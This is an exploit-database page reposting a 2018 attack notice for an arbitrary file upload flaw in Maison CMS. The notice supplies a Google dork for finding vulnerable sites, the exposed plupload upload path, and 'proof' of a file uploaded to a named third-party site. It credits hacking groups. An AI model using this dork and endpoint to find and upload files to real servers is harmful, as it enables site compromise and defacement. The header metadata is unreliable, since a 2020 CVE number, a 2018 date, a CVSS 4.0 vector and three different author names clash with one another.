Advertisement






Maison CMS Arbitrary File Upload

CVE Category Price Severity
CVE-2020-15852 CWE-434 N/A High
Author Risk Exploitation Type Date
Vikas Choudhary High Remote 2018-01-19
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018010187

Below is a copy:

Maison CMS Arbitrary File Upload
======================================================
# Exploit Title: Maison CMS Arbitrary File Upload
# Google Dork: intext:"intext:"assets/admin/plugins/plupload"
# Date: 2018-01-19
# Author: K4an
# Tested on: Win 7, Linux
***************************************************

# exploit => /assets/admin/plugins/plupload/examples/custom.html

# Add exploit => http://www.site.com/assets/admin/plugins/plupload/examples/custom.html

***************************************************

# Proof : 

http://maison33.com/assets/admin/plugins/plupload/examples/custom.html

# Your uploaded file path :

http://maison33.com/assets/admin/plugins/plupload/examples/upload/file_1516368486_7953730.gif


===================================================== 
# Thanks to : ~~> MR.Khatar || Blackwolf_Iran ||Ormazd || Sh@d0w ||Hellish_PN (mamad khodesh) ||Rabinson || Danger BoY 
# Iranian Anonymous 
# Telegram Channel: https://t.me/irananonymous 
# Discovered By: Saman.Khan

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum